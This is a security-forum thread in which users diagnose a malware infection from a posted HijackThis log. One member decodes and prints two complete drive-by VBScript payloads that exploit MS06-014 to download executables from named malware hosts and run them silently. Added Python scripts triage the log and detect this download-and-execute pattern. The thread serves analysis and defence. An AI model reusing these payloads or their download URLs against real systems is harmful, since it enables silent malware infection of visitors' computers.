Rising Kaka Security Forum

My computer got infected after visiting this URL; even a legitimate copy of Rising can't remove it. Mods, please help me
红迷 - 2006-11-22 21:03:00
http://www.32666.com/ad/cfad/qqcf.asp?11&linli1109  Everyone, please help me
6981313 - 2006-11-22 21:07:00
Post a scan log first. Without a log, nobody can help!
Go to http://free5.ys168.com/?jxsbb
and download HijackThis1[1].99.1.rar (0.2MB, system scan tool) or sreng2.zip (0.4MB, system scan tool). Extract it, open it, run it, perform a scan, save the log, and paste the log contents here. Don't change anything; if it doesn't fit in one post, split it across several!
水树雨下 - 2006-11-22 21:09:00
If the AV can detect it, it's probably nothing serious. Let me go take a look……
红迷 - 2006-11-22 21:13:00
Logfile of HijackThis v1.99.1
Scan saved at 21:04:36, on 2005-11-22
Platform: Windows 2003 SP1 (WinNT 5.02.3790)
MSIE: Internet Explorer v6.00 SP1 (6.00.3790.1830)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Rising\Rav\CCenter.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\msdtc.exe
C:\WINDOWS\system32\inetsrv\inetinfo.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\WINDOWS\system32\nvsvc32.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\System32\alg.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Rising\Rav\RavTask.exe
C:\WINDOWS\system32\ctfmon.exe
C:\WINDOWS\system32\conime.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\Program Files\Rising\Rfw\rfwmain.exe
c:\program files\rising\rfw\rfwsrv.exe
C:\Program Files\Rising\Rav\Ravmond.exe
C:\Program Files\Rising\Rav\RAVMON.EXE
C:\Program Files\Rising\Rav\RavStub.exe
C:\Program Files\Rising\Rav\RsAgent.exe
C:\WINDOWS\msagent\AgentSvr.exe
D:\Tencent\QQ\QQ.exe
D:\Tencent\QQ\TIMPlatform.exe
C:\Program Files\wnwb2005\wnwb.exe
C:\Program Files\Macromedia\Fireworks 8\Fireworks.exe
C:\Program Files\Rising\Rav\RsLogVw.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\ACD Systems\ACDSee\8.0\ACDSee8.exe
C:\Program Files\Internet Explorer\iexplore.exe
E:\安全相关\灰鸽子检查器\155847200541134207\HijackThis.exe
C:\Program Files\Rising\KakaToolBar\Ras.exe

R3 - URLSearchHook: bho Class - {ED8DFC5C-10EF-45AB-9DC2-0639AFF5A270} - C:\PROGRA~1\COMMON~1\Wnwb\wnwbio.dll
F2 - REG:system.ini: Shell=
F2 - REG:system.ini: UserInit=C:\WINDOWS\system32\userinit.exe,rundll32.exe C:\WINDOWS\system32\winsys16_061114.dll start,
O2 - BHO: update wnwb - {ED8DFC5C-10EF-45AB-9DC2-0639AFF5A270} - C:\PROGRA~1\COMMON~1\Wnwb\wnwbio.dll
O3 - Toolbar: 卡卡上网安全助手 - {DB9ECD4F-FB8F-4311-B3CE-90B976C2707C} - C:\WINDOWS\system32\kakatool.dll
O4 - HKLM\..\Run: [RavTask] "C:\Program Files\Rising\Rav\RavTask.exe" -system
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - Startup: EyeLoveU.lnk = C:\Program Files\EyeLoveU 3.5\ELU.exe
O4 - Startup: share_del.lnk = C:\share.bat
O8 - Extra context menu item: 上传到QQ网络硬盘 - D:\Tencent\QQ\AddToNetDisk.htm
O8 - Extra context menu item: 添加到QQ自定义面板 - D:\Tencent\QQ\AddPanel.htm
O8 - Extra context menu item: 添加到QQ表情 - D:\Tencent\QQ\AddEmotion.htm
O8 - Extra context menu item: 用QQ彩信发送该图片 - D:\Tencent\QQ\SendMMS.htm
O16 - DPF: {5EC7C511-CD0F-42E6-830C-1BD9882F3458} (PowerPlayer Control) - http://download.ppstream.com/bin/powerplayer.cab
O16 - DPF: {8D9E0B29-563C-4226-86C1-5FF2AE77E1D2} (AxSubmitControl Class) - https://mybank.icbc.com.cn/icbc/perbank/AxSafeControls.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{9314895C-E762-4BB7-AA6D-A104C23A9E2B}: NameServer = 61.234.254.5
O17 - HKLM\System\CCS\Services\Tcpip\..\{D928145B-EDF7-47D9-99F7-E5225500B4B8}: NameServer = 61.234.254.5,192.168.1.1
O18 - Protocol: about - {3050F406-98B5-11CF-BB82-00AA00BDCE0B} - C:\WINDOWS\system32\mshtml.dll
O18 - Protocol: cdl - {3DD53D40-7B8B-11D0-B013-00AA0059CE02} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: dvd - {12D51199-0DB5-46FE-A120-47A3D7D937CC} - C:\WINDOWS\system32\msvidctl.dll
O18 - Protocol: file - {79EAC9E7-BAF9-11CE-8C82-00AA004BA90B} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: ftp - {79EAC9E3-BAF9-11CE-8C82-00AA004BA90B} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: gopher - {79EAC9E4-BAF9-11CE-8C82-00AA004BA90B} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: http - {79EAC9E2-BAF9-11CE-8C82-00AA004BA90B} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: https - {79EAC9E5-BAF9-11CE-8C82-00AA004BA90B} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: ipp - (no CLSID) - (no file)
O18 - Protocol: its - {9D148291-B9C8-11D0-A4CC-0000F80149F6} - C:\WINDOWS\system32\itss.dll
O18 - Protocol: javascript - {3050F3B2-98B5-11CF-BB82-00AA00BDCE0B} - C:\WINDOWS\system32\mshtml.dll
O18 - Protocol: local - {79EAC9E7-BAF9-11CE-8C82-00AA004BA90B} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: mailto - {3050F3DA-98B5-11CF-BB82-00AA00BDCE0B} - C:\WINDOWS\system32\mshtml.dll
O18 - Protocol: mhtml - {05300401-BCBC-11D0-85E3-00C04FD85AB4} - C:\WINDOWS\system32\inetcomm.dll
O18 - Protocol: mk - {79EAC9E6-BAF9-11CE-8C82-00AA004BA90B} - C:\WINDOWS\system32\urlmon.dll
O18 - Protocol: ms-its - {9D148291-B9C8-11D0-A4CC-0000F80149F6} - C:\WINDOWS\system32\itss.dll
O18 - Protocol: msdaipp - (no CLSID) - (no file)
O18 - Protocol: res - {3050F3BC-98B5-11CF-BB82-00AA00BDCE0B} - C:\WINDOWS\system32\mshtml.dll
O18 - Protocol: sysimage - {76E67A63-06E9-11D2-A840-006008059382} - C:\WINDOWS\system32\mshtml.dll
O18 - Protocol: tv - {CBD30858-AF45-11D2-B6D6-00C04FBBDE6E} - C:\WINDOWS\system32\msvidctl.dll
O18 - Protocol: vbscript - {3050F3B2-98B5-11CF-BB82-00AA00BDCE0B} - C:\WINDOWS\system32\mshtml.dll
O18 - Protocol: vnd.ms.radio - {3DA2AA3B-3D96-11D2-9BD2-204C4F4F5020} - C:\WINDOWS\system32\msdxm.ocx
O18 - Protocol: wia - {13F3EA8B-91D7-4F0A-AD76-D2853AC8BECE} - C:\WINDOWS\system32\wiascr.dll
O20 - AppInit_DLLs: 608769M.BMP
O20 - Winlogon Notify: dimsntfy - C:\WINDOWS\SYSTEM32\dimsntfy.dll
O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: iPodService - Apple Computer, Inc. - D:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Network Logon (NetWorkLogon) - Unknown owner - rundll32.exe (file missing)
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
O23 - Service: Rising Proxy  Service (RfwProxySrv) - Beijing Rising Technology Co., Ltd. - c:\program files\rising\rfw\rfwproxy.exe
O23 - Service: Rising Personal Firewall Service (RfwService) - Beijing Rising Technology Co., Ltd. - c:\program files\rising\rfw\rfwsrv.exe
O23 - Service: Rising Process Communication Center (RsCCenter) - Beijing Rising Technology Co., Ltd. - C:\Program Files\Rising\Rav\CCenter.exe
O23 - Service: Rising RealTime Monitor (RsRavMon) - Beijing Rising Technology Co., Ltd. - C:\Program Files\Rising\Rav\Ravmond.exe
O23 - Service: Ulead Burning Helper (UleadBurningHelper) - Ulead Systems, Inc. - C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
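
Beyond the share.bat line the thread focuses on, the posted log has other entries worth a second look: the extra rundll32 entry in UserInit, the AppInit_DLLs value that names a .BMP, and a service whose binary is missing. The following Python triage script is an added example, not code from this thread or from HijackThis; it runs over a handful of lines copied from the log above.

```python
import re

# Constructed sample: a few lines copied from the HijackThis log posted above.
SAMPLE_LOG = "\n".join([
    r"F2 - REG:system.ini: Shell=",
    r"F2 - REG:system.ini: UserInit=C:\WINDOWS\system32\userinit.exe,rundll32.exe C:\WINDOWS\system32\winsys16_061114.dll start,",
    r'O4 - HKLM\..\Run: [RavTask] "C:\Program Files\Rising\Rav\RavTask.exe" -system',
    r"O4 - Startup: share_del.lnk = C:\share.bat",
    r"O20 - AppInit_DLLs: 608769M.BMP",
    r"O23 - Service: Network Logon (NetWorkLogon) - Unknown owner - rundll32.exe (file missing)",
    r"O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe",
])

def triage(log_text):
    """Return (section, line, reason) for every entry that deserves a second look."""
    findings = []
    for line in log_text.splitlines():
        m = re.match(r"^([FOR]\d+) - (.*)$", line)
        if not m:
            continue
        section, body = m.groups()
        reason = None
        if section == "F2" and "UserInit=" in body:
            # A clean UserInit is userinit.exe alone; anything after the comma runs at every logon.
            parts = [p.strip() for p in body.split("UserInit=", 1)[1].split(",") if p.strip()]
            if len(parts) > 1:
                reason = "extra UserInit entry: " + "; ".join(parts[1:])
        elif section == "O20" and "AppInit_DLLs:" in body:
            # AppInit_DLLs is loaded into every process that uses user32.dll;
            # a non-.dll name such as a .BMP is a disguise.
            value = body.split("AppInit_DLLs:", 1)[1].strip()
            if value and not value.lower().endswith(".dll"):
                reason = "AppInit_DLLs names a non-DLL file: " + value
        elif section == "O23" and ("Unknown owner" in body or "file missing" in body):
            reason = "service with unknown owner or missing binary"
        elif section == "O4" and re.search(r"\.(bat|cmd|vbs|js)\b", body, re.I):
            reason = "script file in autostart"
        if reason:
            findings.append((section, line, reason))
    return findings
```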

网络一兵 - 2006-11-22 21:14:00
Quote:
[水树雨下's post] If the AV can detect it, it's probably nothing serious. Let me go take a look……
………………

Did you go in and look? Was it nice????
红迷 - 2006-11-22 21:16:00
This is my computer's process list.
Rising can't find the virus either. I cleaned it manually, but an hour later it broke out again.
水树雨下 - 2006-11-22 21:17:00
Fix
O4 - Startup: share_del.lnk = C:\share.bat
Then delete C:\share.bat in Safe Mode
红迷 - 2006-11-22 21:20:00
Quote:
[水树雨下's post] Fix
O4 - Startup: share_del.lnk = C:\share.bat
Then delete C:\share.bat in Safe Mode
………………

These are my programs. I can clean the virus manually; see the title.
mopery - 2006-11-22 21:27:00
I went in and nothing happened..
水树雨下 - 2006-11-22 21:30:00
Another false positive

[Reply to "网络一兵"'s post]
Boring, pointless……

mopery - 2006-11-22 21:32:00
Probably not a false positive..

Brothers, I'm decoding it, hang on..
westbeck - 2006-11-22 21:44:00
I went and looked too. The source definitely has a problem; it's not a false positive. Wait for mod M to decode it :)
deadmanzj - 2006-11-22 21:54:00
The real site is hXXp://3w.ycdy.com/cfad/0002.htm, but that page itself is fine; it jumps to hXXp://3w.ycdy.com/cfad/0001.htm

and from hXXp://3w.ycdy.com/cfad/0001.htm it keeps jumping

I'm so annoyed... one stupid piece of JS wasted a lot of my time

After a big detour it comes back to the original page, http://www1.ycdy.com/demo/mm.htm, this one:
<script language="VBScript">

on error resume next

MircoLong = "http://www1.ycdy.com/demo/cha0.exe"

    m4="down"
    m5="file"
    m6="copy"
    m7="exit"
    Set MircoLongc = document.createElement("object")
    MircoLongc.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
    seturla=m4
    seturlb=m5
    seturlc=m6
    seturld=m7
    MircoLongi="Microsoft.XMLHTTP"
    Set MircoLongd = MircoLongc.CreateObject(MircoLongi,"")
    seturlf="Ado"
    seturlg="db."
    seturlh="Str"
    seturli="eam"
    MircoLongf=seturlf&seturlg&seturlh&seturli
    MircoLongg=MircoLongf
    set MircoLonga = MircoLongc.createobject(MircoLongg,"")
    MircoLonga.type = 1
    MircoLongh="GET"
    MircoLongd.Open MircoLongh, MircoLong, False
    MircoLongd.Send
    MircoLong9="svchost.exe"
    set MircoLongb = MircoLongc.createobject("Scripting.FileSystemObject","")
    set MircoLonge = MircoLongb.GetSpecialFolder(2)
    MircoLonga.open
    MircoLong8="MircoLonga.BuildPath(MircoLonga,MircoLong8)"
    MircoLong7="MircoLongb.BuildPath(MircoLongb,MircoLong7)"
    MircoLong6="MircoLongc.BuildPath(MircoLongd,MircoLong6)"
    MircoLong5="MircoLongd.BuildPath(MircoLongf,MircoLong5)"
    MircoLong4="MircoLonge.BuildPath(MircoLongg,MircoLong4)"
    MircoLong3="MircoLongf.BuildPath(MircoLongh,MircoLong4)"
    MircoLong2="MircoLongg.BuildPath(MircoLongi,MircoLong3)"
    MircoLong1="MircoLongh.BuildPath(MircoLongg,MircoLong1)"
    MircoLong0="MircoLongi.BuildPath(MircoLongk,MircoLong0)"
    MircoLong9= MircoLongb.BuildPath(MircoLonge,MircoLong9)
    MircoLonga.write MircoLongd.responseBody
    MircoLonga.savetofile MircoLong9,2
    MircoLonga.close
    set MircoLonge = MircoLongc.createobject("Shell.Application","")
    MircoLonge.ShellExecute MircoLong9,BBS,BBS,"open",0


</script>

The second one, http://60.190.222.233/wm/ip2.htm, after decoding:

<html>
<script language="VBScript">
on error resume next
MyQQ5372453="http://60.190.222.233/wm/xia.exe"
Set CAOc = document.createElement("object")
c1 ="clsid:BD"
c2="96C556-65A3-11"
c3="D0-983A-00C04F"
c4="C29E36"
CAOc.setAttribute "classid",c1+c2+c3+c4
seturla="down"
seturlb="file"
seturlc="copy"
seturld="exit"
seturle="base"
CAOi="Microsoft.XMLHTTP"
Set CAOd = CAOc.CreateObject(CAOi,"")
seturlf="Ado"
seturlg="db."
seturlh="Str"
seturli="eam"
CAOf=seturlf&seturlg&seturlh&seturli
CAOg=CAOf
set CAOa = CAOc.createobject(CAOg,"")
CAOa.type = 1
CAOh="GET"
CAOd.Open CAOh, MyQQ5372453, False
CAOd.Send
CAO9="xia.exe"
set CAOb = CAOc.createobject("Scripting.FileSystemObject","")
set CAOe = CAOb.GetSpecialFolder(2)
CAOa.open
CAO8="CAOa.BuildPath(CAOa,CAO8)"
CAO7="CAOb.BuildPath(CAOb,CAO7)"
CAO6="CAOc.BuildPath(CAOd,CAO6)"
CAO5="CAOd.BuildPath(CAOf,CAO5)"
CAO4="CAOe.BuildPath(CAOg,CAO4)"
CAO3="CAOf.BuildPath(CAOh,CAO4)"
CAO2="CAOg.BuildPath(CAOi,CAO3)"
CAO1="CAOh.BuildPath(CAOg,CAO1)"
CAO0="CAOi.BuildPath(CAOk,CAO0)"
CAO9= CAOb.BuildPath(CAOe,CAO9)
CAOa.write CAOd.responseBody
CAOa.savetofile CAO9,2
CAOa.close
set CAOe = CAOc.createobject("Shell.Application","")
CAOe.ShellExecute CAO9,BBS,BBS,"open", 0
</script>
</html>

M wouldn't do this kind of hard labor; grunt work like this gets left to me. I hope he tests more viruses, haha. My writing skills are poor, so I can't write an analysis.
deadmanzj - 2006-11-22 22:02:00
Definitely not a false positive; just look at these two pieces of code. The first downloads http://www1.ycdy.com/demo/cha0.exe, the second downloads http://60.190.222.233/wm/xia.exe. Both exploit the MS06-014 vulnerability…. If you've installed the patch you won't get infected.. I'll download them and take a closer look.
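The download-and-execute chain deadmanzj points out (RDS.DataSpace CLSID, ADODB.Stream, savetofile, Shell.Application) can be recognised on the defender side even when a page splits the CLSID and object names into pieces, as both decoded pages do. The following Python is an added example, not code from this thread; the page it scans is a constructed sample that mirrors the posted scripts' string splitting.

```python
import re

# Constructed sample modelled on the decoded page quoted in this thread: the
# RDS.DataSpace CLSID and "Adodb.Stream" are split into pieces and reassembled.
SAMPLE_HTML = """<html><script language="VBScript">
c1 ="clsid:BD"
c2="96C556-65A3-11"
c3="D0-983A-00C04F"
c4="C29E36"
CAOc.setAttribute "classid",c1+c2+c3+c4
seturlf="Ado"
seturlg="db."
seturlh="Str"
seturli="eam"
CAOf=seturlf&seturlg&seturlh&seturli
CAOa.savetofile CAO9,2
set CAOe = CAOc.createobject("Shell.Application","")
</script></html>"""

# Substrings that together form the download-and-execute chain in the posted scripts.
INDICATORS = {"rds.dataspace": "clsid:bd96c556-65a3-11d0-983a-00c04fc29e36",
              "adodb.stream": "adodb.stream", "savetofile": "savetofile",
              "shell": "shell.application"}

def fold(expr, consts):
    """Join string literals and known constants combined with & or +; None if a piece is unknown."""
    pieces = [p.strip() for p in re.split(r"[&+]", expr)]
    vals = [p[1:-1] if len(p) > 1 and p[0] == p[-1] == '"' else consts.get(p.lower()) for p in pieces]
    return None if None in vals else "".join(vals)

def resolve_strings(script):
    """Fold plain `name = expr` lines, in order, into a dict of constant strings."""
    consts = {}  # limitation: a literal that itself contains & or + is mis-split
    for m in re.finditer(r"^\s*(\w+)\s*=\s*(.+?)\s*$", script, re.M):
        value = fold(m.group(2), consts)
        if value is not None:
            consts[m.group(1).lower()] = value
    return consts

def assess(html):
    """Return the names from INDICATORS that a page's VBScript assembles, even when obfuscated."""
    found = set()
    for script in re.findall(r"<script[^>]*>(.*?)</script>", html, re.I | re.S):
        consts = resolve_strings(script)
        text = script.lower() + " " + " ".join(consts.values()).lower()
        for m in re.finditer(r'setattribute\s+"classid"\s*,\s*(.+)$', script, re.I | re.M):
            text += " " + (fold(m.group(1), consts) or "").lower()  # rebuilt classid
        found.update(name for name, needle in INDICATORS.items() if needle in text)
    return found
```

Hitting all four indicators is the pattern of the pages quoted above; a page that assembles only the CLSID still warrants a look.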
deadmanzj - 2006-11-22 22:11:00
I downloaded and ran them. The first, http://www1.ycdy.com/demo/cha0.exe,
generates Viking (威金) LOGO1_.EXE and a whole pile of other stuff, and infects every exe file, turning them into ***.exe.Exe

The second, http://60.190.222.233/wm/xia.exe, creates C:\WINDOWS\uninstall\rundl132.exe and C:\WINDOWS\RichDll.dll; it also looks like Viking

It connects to the network; I suspect it's a downloader (DL)... a whole pile of stuff
deadmanzj - 2006-11-22 22:37:00
The OP isn't around... so frustrating... well, consider it a review session